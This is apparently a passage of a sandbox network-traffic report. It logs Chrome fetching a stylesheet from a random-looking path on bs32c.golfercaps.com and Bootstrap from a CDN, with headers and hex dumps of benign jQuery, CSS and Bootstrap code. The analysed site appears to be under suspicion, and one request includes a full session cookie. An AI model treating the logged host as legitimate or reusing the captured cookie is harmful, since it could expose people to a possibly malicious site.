                                                                  Data Ascii: [a]},pushStack:function(a){var b=r.merge(this.constructor(),a);return b.prevObject=this,b},each:function(a){return r.each(this,a)},map:function(a){return this.pushStack(r.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushSta
                                                                  2024-12-30 21:42:33 UTC1378INData Raw: 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6b 2e 63 61 6c 6c 28 61 29 29 26 26 28 21 28 62 3d 65 28 61 29 29 7c 7c 28 63 3d 6c 2e 63 61 6c 6c 28 62 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 62 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 63 26 26 6d 2e 63 61 6c 6c 28 63 29 3d 3d 3d 6e 29 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3b 66 6f 72 28 62 20 69 6e 20 61 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 74 79 70 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 3f 61 2b 22 22 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 61 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70
                                                                  Data Ascii: ject Object]"!==k.call(a))&&(!(b=e(a))||(c=l.call(b,"constructor")&&b.constructor,"function"==typeof c&&m.call(c)===n))},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typ
                                                                  2024-12-30 21:42:33 UTC1378INData Raw: 6e 6f 77 2c 73 75 70 70 6f 72 74 3a 6f 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 28 72 2e 66 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 63 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 29 2c 72 2e 65 61 63 68 28 22 42 6f 6f 6c 65 61 6e 20 4e 75 6d 62 65 72 20 53 74 72 69 6e 67 20 46 75 6e 63 74 69 6f 6e 20 41 72 72 61 79 20 44 61 74 65 20 52 65 67 45 78 70 20 4f 62 6a 65 63 74 20 45 72 72 6f 72 20 53 79 6d 62 6f 6c 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 6a 5b 22 5b 6f 62 6a 65 63 74 20 22 2b 62 2b 22 5d 22 5d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 77 28 61 29 7b 76 61 72 20 62 3d 21 21 61 26 26 22 6c 65
                                                                  Data Ascii: now,support:o}),"function"==typeof Symbol&&(r.fn[Symbol.iterator]=c[Symbol.iterator]),r.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(a,b){j["[object "+b+"]"]=b.toLowerCase()});function w(a){var b=!!a&&"le
                                                                  2024-12-30 21:42:33 UTC1378INData Raw: 22 29 22 29 2c 43 4c 41 53 53 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 5c 5c 2e 28 22 2b 4c 2b 22 29 22 29 2c 54 41 47 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 2b 4c 2b 22 7c 5b 2a 5d 29 22 29 2c 41 54 54 52 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 29 2c 50 53 45 55 44 4f 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4e 29 2c 43 48 49 4c 44 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 3a 28 6f 6e 6c 79 7c 66 69 72 73 74 7c 6c 61 73 74 7c 6e 74 68 7c 6e 74 68 2d 6c 61 73 74 29 2d 28 63 68 69 6c 64 7c 6f 66 2d 74 79 70 65 29 28 3f 3a 5c 5c 28 22 2b 4b 2b 22 2a 28 65 76 65 6e 7c 6f 64 64 7c 28 28 5b 2b 2d 5d 7c 29 28 5c 5c 64 2a 29 6e 7c 29 22 2b 4b 2b 22 2a 28 3f 3a 28 5b 2b 2d 5d 7c 29 22 2b 4b 2b 22 2a 28 5c 5c 64 2b 29 7c 29 29 22 2b 4b
                                                                  Data Ascii: ")"),CLASS:new RegExp("^\\.("+L+")"),TAG:new RegExp("^("+L+"|[*])"),ATTR:new RegExp("^"+M),PSEUDO:new RegExp("^"+N),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+K+"*(even|odd|(([+-]|)(\\d*)n|)"+K+"*(?:([+-]|)"+K+"*(\\d+)|))"+K
                                                                  2024-12-30 21:42:33 UTC1378INData Raw: 3d 3d 77 26 26 31 31 21 3d 3d 77 29 72 65 74 75 72 6e 20 64 3b 69 66 28 21 65 26 26 28 28 62 3f 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 3a 76 29 21 3d 3d 6e 26 26 6d 28 62 29 2c 62 3d 62 7c 7c 6e 2c 70 29 29 7b 69 66 28 31 31 21 3d 3d 77 26 26 28 6c 3d 5a 2e 65 78 65 63 28 61 29 29 29 69 66 28 66 3d 6c 5b 31 5d 29 7b 69 66 28 39 3d 3d 3d 77 29 7b 69 66 28 21 28 6a 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 29 29 29 72 65 74 75 72 6e 20 64 3b 69 66 28 6a 2e 69 64 3d 3d 3d 66 29 72 65 74 75 72 6e 20 64 2e 70 75 73 68 28 6a 29 2c 64 7d 65 6c 73 65 20 69 66 28 73 26 26 28 6a 3d 73 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 29 29 26 26 74 28 62 2c 6a 29 26 26 6a 2e 69 64 3d 3d 3d 66 29 72 65 74 75 72 6e 20 64 2e 70 75 73 68
                                                                  Data Ascii: ==w&&11!==w)return d;if(!e&&((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,p)){if(11!==w&&(l=Z.exec(a)))if(f=l[1]){if(9===w){if(!(j=b.getElementById(f)))return d;if(j.id===f)return d.push(j),d}else if(s&&(j=s.getElementById(f))&&t(b,j)&&j.id===f)return d.push
                                                                  2024-12-30 21:42:33 UTC1378INData Raw: 20 6d 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 22 69 6e 70 75 74 22 3d 3d 3d 63 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6e 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 28 22 69 6e 70 75 74 22 3d 3d 3d 63 7c 7c 22 62 75 74 74 6f 6e 22 3d 3d 3d 63 29 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 62 3f 62 2e 70 61
                                                                  Data Ascii: ma(a){return function(b){var c=b.nodeName.toLowerCase();return"input"===c&&b.type===a}}function na(a){return function(b){var c=b.nodeName.toLowerCase();return("input"===c||"button"===c)&&b.type===a}}function oa(a){return function(b){return"form"in b?b.pa
                                                                  2024-12-30 21:42:33 UTC1378INData Raw: 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 7c 7c 21 6e 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 75 29 2e 6c 65 6e 67 74 68 7d 29 2c 63 2e 67 65 74 42 79 49 64 3f 28 64 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 72 65 70 6c 61 63 65 28 5f 2c 61 61 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 62 7d 7d 2c 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29
                                                                  Data Ascii: getElementsByName||!n.getElementsByName(u).length}),c.getById?(d.filter.ID=function(a){var b=a.replace(_,aa);return function(a){return a.getAttribute("id")===b}},d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c=b.getElementById(a)
                                                                  2024-12-30 21:42:33 UTC1378INData Raw: 2e 70 75 73 68 28 22 5b 2a 5e 24 5d 3d 22 2b 4b 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4b 2b 22 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 4a 2b 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 75 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 7e 3d 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 75 2b 22 2b 2a 22 29 2e
                                                                  Data Ascii: .push("[*^$]="+K+"*(?:''|\"\")"),a.querySelectorAll("[selected]").length||q.push("\\["+K+"*(?:value|"+J+")"),a.querySelectorAll("[id~="+u+"-]").length||q.push("~="),a.querySelectorAll(":checked").length||q.push(":checked"),a.querySelectorAll("a#"+u+"+*").
                                                                  2024-12-30 21:42:33 UTC1378INData Raw: 65 29 69 66 28 62 3d 3d 3d 61 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 42 3d 62 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 64 3d 21 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 64 3f 64 3a 28 64 3d 28 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 61 29 3d 3d 3d 28 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 29 3f 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 62 29 3a 31 2c 31 26 64 7c 7c 21 63 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75
                                                                  Data Ascii: e)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!0,0;var d=!a.compareDocumentPosition-!b.compareDocumentPosition;return d?d:(d=(a.ownerDocument||a)===(b.ownerDocument||b)?a.compareDocumentPosition(b):1,1&d||!c.sortDetached&&b.compareDocu


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  34192.168.2.458489188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:33 UTC1377OUTGET /vfd23ced/assets/axit-jquery.autocomplete.css HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: text/css,*/*;q=0.1
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: style
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:33 UTC880INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:33 GMT
                                                                  Content-Type: text/css
                                                                  Content-Length: 1518
                                                                  Connection: close
                                                                  Last-Modified: Fri, 06 Dec 2024 11:08:25 GMT
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: REVALIDATED
                                                                  Accept-Ranges: bytes
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cUiw9kE9qhpgonfzIdZF4%2FEdd3VnI8uziIPL8uKXo2XgodBzM%2Fj%2BzM3wvpY6HgGEO0bqRVepBkzWKui53wpMulmpzurLPZgfXNL8sd5cBZIWebEmp9wzSE0oClID%2FNs6ICWroFtJSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa5334cee8f8c87-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2014&min_rtt=2011&rtt_var=762&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1955&delivery_rate=1429970&cwnd=214&unsent_bytes=0&cid=0815d8fa50b448ab&ts=306&x=0"
                                                                  2024-12-30 21:42:33 UTC489INData Raw: 2f 2a 20 43 6f 64 65 20 74 69 64 69 65 64 20 75 70 20 62 79 20 53 63 72 61 70 42 6f 6f 6b 20 2a 2f 0a 2e 75 69 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 20 7b 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 62 6c 61 63 6b 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 32 30 30 70 78 3b 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 61 75 74 6f 3b 20 6f 76 65 72 66 6c 6f 77 2d 78 3a 20 68 69 64 64 65 6e 3b 20 7d 0a 2e 75 69 2d 6d 65 6e 75 2d 69 74 65 6d 2d 6f 64 64 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 32 33 38 2c 20 32 33 38 2c 20 32 33 38 29 3b 20 7d 0a 6c 69 20 3e 20 2e 75 69 2d 63 6f 72 6e 65 72 2d 61 6c 6c 2c 20 2e 75 69 2d 63 6f 72 6e 65 72 2d 74 6f 70 2c 20 2e 75 69 2d 63 6f 72
                                                                  Data Ascii: /* Code tidied up by ScrapBook */.ui-autocomplete { padding: 0px; border: 1px solid black; max-height: 200px; overflow-y: auto; overflow-x: hidden; }.ui-menu-item-odd { background-color: rgb(238, 238, 238); }li > .ui-corner-all, .ui-corner-top, .ui-cor
                                                                  2024-12-30 21:42:33 UTC1029INData Raw: 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 20 30 70 78 3b 20 7d 0a 6c 69 20 3e 20 2e 75 69 2d 63 6f 72 6e 65 72 2d 61 6c 6c 2c 20 2e 75 69 2d 63 6f 72 6e 65 72 2d 62 6f 74 74 6f 6d 2c 20 2e 75 69 2d 63 6f 72 6e 65 72 2d 72 69 67 68 74 2c 20 2e 75 69 2d 63 6f 72 6e 65 72 2d 62 72 20 7b 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 20 30 70 78 3b 20 7d 0a 2e 75 69 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2d 69 6e 70 75 74 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 20 75 72 6c 28 22 49 63 6f 6e 53 65 61 72 63 68 2e 73 76 67 22 29 20 6e 6f 2d 72 65 70 65 61 74 20 73 63 72 6f 6c 6c 20 72 69 67 68 74 20 33 70 78 20 63 65 6e 74 65 72 20 2f 20 31 36 70 78 20 31
                                                                  Data Ascii: order-bottom-left-radius: 0px; }li > .ui-corner-all, .ui-corner-bottom, .ui-corner-right, .ui-corner-br { border-bottom-right-radius: 0px; }.ui-autocomplete-input { background: transparent url("IconSearch.svg") no-repeat scroll right 3px center / 16px 1


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  35192.168.2.458495104.18.10.207443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:33 UTC565OUTGET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1
                                                                  Host: stackpath.bootstrapcdn.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: script
                                                                  Referer: https://bs32c.golfercaps.com/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:33 UTC966INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:33 GMT
                                                                  Content-Type: application/javascript; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CDN-PullZone: 252412
                                                                  CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                  CDN-RequestCountryCode: US
                                                                  Vary: Accept-Encoding
                                                                  Access-Control-Allow-Origin: *
                                                                  Cache-Control: public, max-age=31919000
                                                                  ETag: W/"67176c242e1bdc20603c878dee836df3"
                                                                  Last-Modified: Mon, 25 Jan 2021 22:04:06 GMT
                                                                  CDN-ProxyVer: 1.04
                                                                  CDN-RequestPullSuccess: True
                                                                  CDN-RequestPullCode: 200
                                                                  CDN-CachedAt: 10/04/2024 02:53:43
                                                                  CDN-EdgeStorageId: 1029
                                                                  timing-allow-origin: *
                                                                  cross-origin-resource-policy: cross-origin
                                                                  X-Content-Type-Options: nosniff
                                                                  CDN-Status: 200
                                                                  CDN-RequestTime: 1
                                                                  CDN-RequestId: 7fedeed1ac4f734c4f5baf0abe375bbe
                                                                  CDN-Cache: HIT
                                                                  CF-Cache-Status: HIT
                                                                  Age: 485062
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa5334cddfa42ef-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2024-12-30 21:42:33 UTC403INData Raw: 37 62 65 64 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 31 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28
                                                                  Data Ascii: 7bed/*! * Bootstrap v4.1.3 (https://getbootstrap.com/) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 66 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 68 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69
                                                                  Data Ascii: fine(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defi
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 2c 50 6e 2c 6a 6e 2c 48 6e 2c 4c 6e 2c 52 6e 2c 78 6e 2c 57 6e 2c 55 6e 2c 71 6e 2c 46 6e 3d 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 65 3d 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 6e 3d 21 31 3b 72 65 74 75 72 6e 20 69 28 74 68 69 73 29 2e 6f 6e 65 28 6c 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 3d 21 30 7d 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 7c 7c 6c 2e 74 72 69 67 67 65 72 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 65 29 7d 2c 74 29 2c 74 68 69 73 7d 76 61 72 20 6c 3d 7b 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 3a 22 62 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 67 65 74 55 49 44
                                                                  Data Ascii: ,Pn,jn,Hn,Ln,Rn,xn,Wn,Un,qn,Fn=function(i){var e="transitionend";function t(t){var e=this,n=!1;return i(this).one(l.TRANSITION_END,function(){n=!0}),setTimeout(function(){n||l.triggerTransitionEnd(e)},t),this}var l={TRANSITION_END:"bsTransitionEnd",getUID
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 61 6e 64 6c 65 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 2c 6c 7d 28 65 29 2c 4b 6e 3d 28 6e 3d 22 61 6c 65 72 74 22 2c 61 3d 22 2e 22 2b 28 6f 3d 22 62 73 2e 61 6c 65 72 74 22 29 2c 63 3d 28 72 3d 65 29 2e 66 6e 5b 6e 5d 2c 75 3d 7b 43 4c 4f 53 45 3a 22 63 6c 6f 73 65 22 2b 61 2c 43 4c 4f 53 45 44 3a 22 63 6c 6f 73 65 64 22 2b 61 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 61 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 66 3d 22 61 6c 65 72 74 22 2c 64 3d 22 66 61 64 65 22 2c 67 3d 22 73 68 6f 77 22 2c 5f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 74 7d 76 61 72 20 74 3d 69 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72
                                                                  Data Ascii: andler.apply(this,arguments)}},l}(e),Kn=(n="alert",a="."+(o="bs.alert"),c=(r=e).fn[n],u={CLOSE:"close"+a,CLOSED:"closed"+a,CLICK_DATA_API:"click"+a+".data-api"},f="alert",d="fade",g="show",_=function(){function i(t){this._element=t}var t=i.prototype;retur
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 5f 2e 5f 68 61 6e 64 6c 65 44 69 73 6d 69 73 73 28 6e 65 77 20 5f 29 29 2c 72 2e 66 6e 5b 6e 5d 3d 5f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 72 2e 66 6e 5b 6e 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 5f 2c 72 2e 66 6e 5b 6e 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 66 6e 5b 6e 5d 3d 63 2c 5f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 5f 29 2c 4d 6e 3d 28 70 3d 22 62 75 74 74 6f 6e 22 2c 79 3d 22 2e 22 2b 28 76 3d 22 62 73 2e 62 75 74 74 6f 6e 22 29 2c 45 3d 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 3d 28 6d 3d 65 29 2e 66 6e 5b 70 5d 2c 54 3d 22 61 63 74 69 76 65 22 2c 62 3d 22 62 74 6e 22 2c 49 3d 27 5b 64 61 74 61 2d 74 6f 67 67 6c 65 5e 3d 22 62 75 74 74 6f 6e 22 5d 27
                                                                  Data Ascii: _._handleDismiss(new _)),r.fn[n]=_._jQueryInterface,r.fn[n].Constructor=_,r.fn[n].noConflict=function(){return r.fn[n]=c,_._jQueryInterface},_),Mn=(p="button",y="."+(v="bs.button"),E=".data-api",C=(m=e).fn[p],T="active",b="btn",I='[data-toggle^="button"]'
